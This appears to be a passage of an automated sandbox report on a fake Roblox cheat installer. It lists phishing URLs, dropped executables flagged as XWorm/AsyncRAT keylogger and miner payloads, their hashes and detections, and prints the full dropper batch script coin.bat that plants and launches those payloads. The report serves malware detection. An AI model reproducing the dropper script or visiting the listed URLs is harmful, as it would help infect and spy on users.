                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        http://ipfs.io/ipfs/QmdV2HGdtwWnonRSvaFvw4QTsSJKp6SREdhoc9BgEawLxT/Karyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50
                                                                        http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                        • 184.28.90.27
                                                                        • 20.114.59.183
                                                                        • 20.12.23.50

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\AppData\Local\Temp\Keyloger.exeKeyloger.exeGet hashmaliciousXWormBrowse
                                                                          cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                            C:\Users\user\AppData\Local\Temp\BitCoin_miner.execheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                              C:\Users\user\AppData\Local\Temp\ msedge.execheat_roblox.exeGet hashmaliciousXWormBrowse

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\roblox cheat.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\roblox cheat.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):522
                                                                                Entropy (8bit):5.358731107079437
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                Malicious:true
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                C:\Users\user\AppData\Local\Roblox\logs\cacert.pem

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):233235
                                                                                Entropy (8bit):6.025218023713329
                                                                                Encrypted:false
                                                                                SSDEEP:3072:OhGvwW6Jj7ITWYv0yoVH283rz9WqIAsjjg4DsUQS88UP4TFf3xVOVkCC554jMN/C:M5W+j8chWf8xyvp5iIzB4CNxza/MK
                                                                                MD5:0194EB945475F93844C0FAE769C0FA0B
                                                                                SHA1:D72876A801C702348EA5B4B4A333C484F2A721FD
                                                                                SHA-256:A6BC06B8255E4AFE2EEFF34684605D04DF9EC246FC201BF5E44137987189A0D3
                                                                                SHA-512:72A00FE6B9111CAB22F1F424F815A617BE2041A3857A6265B004CA1BFD10F345CA33369CD43009B483F9436CCBCD69C70F7033A85D94527B1F39846B75B43C17
                                                                                Malicious:false
                                                                                Preview:##..## Bundle of CA Root Certificates..##..## Certificate data from Mozilla as of: Mon Mar 11 15:25:27 2024 GMT..##..## This is a bundle of X.509 certificates of public Certificate Authorities..## (CA). These were automatically extracted from Mozilla's root certificates..## file (certdata.txt). This file can be found in the mozilla source tree:..## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt..##..## It contains the certificates in PEM format and therefore..## can be directly used with curl / libcurl / php_curl, or with..## an Apache+mod_ssl webserver for SSL client authentication...## Just configure this file as the SSLCACertificateFile...##..## Conversion done with mk-ca-bundle.pl version 1.29...## SHA256: 4d96bd539f4719e9ace493757afbe4a23ee8579de1c97fbebc50bba3c12e8c1e..##......GlobalSign Root CA..==================..-----BEGIN CERTIFICATE-----..MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk

                                                                                C:\Users\user\AppData\Local\Roblox\logs\robloxPX1instaler_48CB5.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2391
                                                                                Entropy (8bit):5.309404675837622
                                                                                Encrypted:false
                                                                                SSDEEP:48:D0/J4ZdvP4DSGFkir0fZvxHOgZ6ubEgZ6ubHgZ6ubmKLYZJjK4z/HY5Wy5ssZZYu:8gSC8Q858HR3rQlAhJ0iJS
                                                                                MD5:D2317281B593C3526836EF471F6F76B6
                                                                                SHA1:6985AB2FE7F824863C4C8C28201D37EE359C56E8
                                                                                SHA-256:5FFBCFE9926B5963E543CCD2C0BEB7E32F1376DF21E2473FE83DAB0137F6CD5C
                                                                                SHA-512:B40981F9A20A64C273182061E878E751B08A6E6B8B0775E9535D10F0D8C9FF8A2480375F30C021A8720E174E4B81C583656E4EB451FB60299FD18FFF8FEBF9C0
                                                                                Malicious:false
                                                                                Preview:2024-07-29T22:54:24.892Z..2024-07-29T22:54:24.070Z,0.070538,149c,6,Info [FLog::DesktopInstaller] The installer reporter is initialized..2024-07-29T22:54:24.070Z,0.070604,149c,6,Info [FLog::DesktopInstaller] Reporting Installer Start..2024-07-29T22:54:25.423Z,1.423282,1c08,6,Info [FLog::DesktopInstaller] Start the Installer thread..2024-07-29T22:54:25.543Z,1.543512,1c08,6,Info [FLog::DesktopInstaller] The installer will run InstallNormal..2024-07-29T22:54:25.543Z,1.543583,1c08,6,Info [FLog::DesktopInstaller] Fetch flag info..2024-07-29T22:54:26.305Z,2.305960,15a8,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, body: ..2024-07-29T22:55:11.272Z,47.272144,15a8,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, b

                                                                                C:\Users\user\AppData\Local\Temp\ msedge.exe

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):166912
                                                                                Entropy (8bit):6.251413929646261
                                                                                Encrypted:false
                                                                                SSDEEP:3072:TmnOFd9UhOMQRUGKXs+S++7KFSbxeY+qDDrMK:3d9YGqStKEbxI
                                                                                MD5:D653AEF66E218FB009B43365919BBCE3
                                                                                SHA1:D38CAFCD950B901EE79FF72EBB87FEC8B2D9582A
                                                                                SHA-256:E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
                                                                                SHA-512:FF4776B44ACD815251908B7D726980FA9DE5E02AED32026C5A72B64A7B0A464399BE730EE37473FDE3406AE7D7D43284018ADE4D32FC160F579764344DA06EF6
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                Joe Sandbox View:
                                                                                • Filename: cheat_roblox.exe, Detection: malicious, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................@.....................................S.......L............................................................................ ............... ..H............text....... ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........U...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):140288
                                                                                Entropy (8bit):5.566968845764678
                                                                                Encrypted:false
                                                                                SSDEEP:3072:6mnOFd9U8OM+fe295liNgTddwY0JwsR4TbswYqkX5bEdGDOjESHhddJWjjY/ffIo:Wd9UH95D
                                                                                MD5:3AFF3B824FC5BCD05EF4D8EEE176E443
                                                                                SHA1:422883493E21D605CB47CC08FD48CAEAD73F414C
                                                                                SHA-256:79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
                                                                                SHA-512:126818953B72233B2B0C50523ACE1EA8D1004F80EEDD0414A4FD3E4E385A3CB1D29E3D9BF7B50FA28AE5CC8EF2BF543D6416531F05FB977A79E60E51A82B03AE
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                Joe Sandbox View:
                                                                                • Filename: cheat_roblox.exe, Detection: malicious, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................@.....................................S.......<....................`....................................................... ............... ..H............text....... ...................... ..`.rsrc...<...........................@..@.reloc.......`......."..............@..B........................H........U...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                C:\Users\user\AppData\Local\Temp\Keyloger.exe

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):168960
                                                                                Entropy (8bit):5.30703099621005
                                                                                Encrypted:false
                                                                                SSDEEP:3072:PV8w386j+bSL1OGtLJBz65/M6If+3Js+3JFkKeTnY:PN6bsrxBt25
                                                                                MD5:520E97797B27B752130B3E982953CEAF
                                                                                SHA1:AB460DA7E69D43747D98A4F45F5BB09D0E971789
                                                                                SHA-256:8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
                                                                                SHA-512:3219E4FE6B23411B48930FCE21DA24C8CE9BB07C6B069FA38B26B32DCC102C668F32AE816BD526CFBB44480F8279586509EBB11E9B75138A1F59AE771AA53664
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 82%
                                                                                Joe Sandbox View:
                                                                                • Filename: Keyloger.exe, Detection: malicious, Browse
                                                                                • Filename: cheat_roblox.exe, Detection: malicious, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?[.f............................."... ...@....@.. ....................................@.................................X"..S....@..Z............................................................................ ............... ..H............text........ ...................... ..`.rsrc...Z....@......................@..@.reloc..............................@..B................."......H........]..........&.....................................................(....*.r...p*. .x!.*..(....*.rc..p*. !...*.s.........s.........s.........s.........*.r...p*. .&..*.r'..p*. ~.H.*.r...p*. .(T.*.r...p*. ..$.*.rM..p*. C.?.*..((...*.r_..p*. [...*.r...p*. .A..*"(....+.*&(....&+.*.+5sR... .... .'..oS...(,...~....-.(G...(9...~....oT...&.-.*.r%..p*. S...*.ri..p*. ....*.r...p*.r...p*. ....*.r5..p*. *p{.*.ry..p*. ...*..............j..................sU..............*"(I...+.*:

                                                                                C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\roblox cheat.exe
                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):630062
                                                                                Entropy (8bit):7.130280084277062
                                                                                Encrypted:false
                                                                                SSDEEP:12288:yyveQB/fTHIGaPkKEYzURNAwbAgOT+t1/l36KUU0TetYsO3IB/m+:yuDXTIGaPhEYzUzA0bZB0gOY9z
                                                                                MD5:FC411F4D9F4DBA5104CB1549153A8684
                                                                                SHA1:A4591F154FBC922A8409A1C010DF6706F69A95E8
                                                                                SHA-256:28A6ACCC3134DDD287CA1C37D2C136C39255EF1654475F1E4DBC511F9D0EA35D
                                                                                SHA-512:000681D2C7A1AFA4BAA5470F6C46349B021C88F3D070BCEACBF0F2B6A6BAC6FF3F1E4F31729DB619C8E455FDF3B810662E24C446DC76F73E5C0DAD2DD6536C0B
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 61%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...j.................@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\coin.bat

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):517
                                                                                Entropy (8bit):5.103767602316603
                                                                                Encrypted:false
                                                                                SSDEEP:12:Z0DtzHGtzs22yZOVqZwGJbShOVqZwGJbKy5intuAfhH0HR:ZMz0zsBiO4Z+O4ZOKuPfQR
                                                                                MD5:DE26F0FF06A38A22766F3978775B13BD
                                                                                SHA1:A845EBED70BF63BD700B0AFF5418ECA6CC9177ED
                                                                                SHA-256:8902A3F7733E13FDA8183E490550D22C8711CF30B5661CB554579C1F47A0609A
                                                                                SHA-512:8EEE58C2312F3488EE86F50E84CB854189254753A265B7E52C564ECA5A3C0836CD059B9540DADD531EED948AEBC1F88D4B7D466780FEB8C39F7E56DDC89D22B1
                                                                                Malicious:false
                                                                                Preview:%echo off..copy %temp%\msedge.exe %systemDrive%\Program Files (x86)\Microsoft\Edge\Application..start %systemDrive%\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..copy %temp%\BitCoin_miner.exe %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6..start %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6\BitCoin_miner..copy %temp%\Keyloger.exe %systemDrive%\Program Files (x86)..start %systemDrive%\Program Files (x86)\Keyloger.exe..start cmd..start https://2no.co/24RXx6

                                                                                C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\roblox cheat.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):5720984
                                                                                Entropy (8bit):6.362394353465928
                                                                                Encrypted:false
                                                                                SSDEEP:98304:v7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuq7:70cB3djgmggDaRXAtHB
                                                                                MD5:27469372591B14FF1C57654FACB5E020
                                                                                SHA1:492C166CD0E6C8D122CA4687659BF047CD48AFD7
                                                                                SHA-256:3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
                                                                                SHA-512:0CFA845DE57ACF6F17F295F0771C2A61CD846EFDEE79DA012DEF474BCAA91D9E99D3D528CF5698E6112A310C4F97E98AE74B6CFC601B2988C51E92270EBF92A2
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..................M.....M...P.....9.......................9...M.....+.....M.....T............M.......O...T...(...T.;...S...T.....Rich....................PE..L................"......b4......... (/.......4...@..........................`......`/X...@.................................D.B.T....0..............."W..)......<[....@.p.....................@.......@.@.............4.<............................text...v`4......b4................. ..`.rdata..Rs....4..t...f4.............@..@.data....+....C..*....B.............@....rsrc........0........O.............@..@.reloc..<[.......\....T.............@..B................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2673
                                                                                Entropy (8bit):3.985988192942646
                                                                                Encrypted:false
                                                                                SSDEEP:48:8XjdKTAPHoidAKZdA1P4ehwiZUklqehqy+3:8s8iOFy
                                                                                MD5:A573E32B79E80E709038E2A044F7C09D
                                                                                SHA1:D4B185516CC06CB344744BE7C427BE3E3B3610FD
                                                                                SHA-256:F3056483F3B694B0665ADAFA3855241A429213DBC905C36066A54E4F402A88A8
                                                                                SHA-512:A3968604862A6D3225104149A2291DBA4A536D2C077863148E7B0A7AB8D1D4BBD1992591366A838A3B35BADB7B1914705C9AAE853A0218CDD49754FB9442E650
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,......*M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2675
                                                                                Entropy (8bit):4.001074407037593
                                                                                Encrypted:false
                                                                                SSDEEP:48:8rdKTAPHoidAKZdA1+4eh/iZUkAQkqeh1y+2:808DF9QYy
                                                                                MD5:8A96483F5A433A421554EC4BFDB1607F
                                                                                SHA1:92DC4BE2EE8E26CA5F3B07E32FE5F4005ACFE06E
                                                                                SHA-256:9C6F4BA405804D76438342C6A6B46A09C8FD4BF4CE241079AE28318FBD90A632
                                                                                SHA-512:20DAB0145249AADD5931ACACCCFC22CADF5BEE75080FF397182F8D07AE3AB75CEDB163AE2587CED2811EF129447D499BD9E7DB7970D07F1B4977F66C6DD0E21A
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,.......M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2689
                                                                                Entropy (8bit):4.006283961881025
                                                                                Encrypted:false
                                                                                SSDEEP:48:8ydKTAVHoidAKZdA1404eh7sFiZUkmgqeh7s7y+BX:8X8IInBy
                                                                                MD5:A44405DFCEBA0352CDE5008AD94F000C
                                                                                SHA1:0EEF23947A6CE9DD544B4FE30AA9669F39B07786
                                                                                SHA-256:B94D3E47BF21DC3EE60A751B4230CB2D7FE544955CCE49AE2B2933923E6C754E
                                                                                SHA-512:86C8EE9F618D085E5494F5D88BFC6244415A11564A45C4B2E19780DF5A3B07F4EF47EE0427B870DA1B8F414F0A3F4682E5DDF67F0AE22D0D3FF5AF053505A152
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,.....<}.i.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.F...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2677
                                                                                Entropy (8bit):3.9986784601802787
                                                                                Encrypted:false
                                                                                SSDEEP:48:85dKTAPHoidAKZdA1p4ehDiZUkwqehJy+R:8O8U5jy
                                                                                MD5:2B49338422ABAEC8C1CFDDF580772C0E
                                                                                SHA1:CE37BFB477295DCD83D9E7965021667B9E2786CA
                                                                                SHA-256:7B7BE0F48309D29DA243E78A59F07B13EE1E2A0603B80D1F724D03AFD3E97093
                                                                                SHA-512:CEC46669F17997E65316F9BCEA46B9088819BAB1359D37B98D2BF74B527A0BB4271DBAEEB4312E3C90900C5C43A57AFB84B385C24810DACE53E5893A2E4F29DF
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,....k..M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:54:43 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2677
                                                                                Entropy (8bit):3.986461418473657
                                                                                Encrypted:false
                                                                                SSDEEP:48:8IdKTAPHoidAKZdA1X4ehBiZUk1W1qehHy+C:8B86b9ny
                                                                                MD5:CAFE09B6E4D1D2EC16EC183E52C4C678
                                                                                SHA1:C2DA6DFF7DB01E41DFFA2C52E5CC99F47BD28CA3
                                                                                SHA-256:12B3A94B52FA422D23295DD6D45882BD1A359A19BB0CF67257FBFD0CA629A0A1
                                                                                SHA-512:81A71592B8C89D4E1652EE3E1D4C75DB8F7FDC5A799E9C257C7C8611DF2A93D4AFC802EAF93AB535FE48CA34AF3A3FEF285EF8DA1E2B1E66575367555C26B170
                                                                                Malicious:false
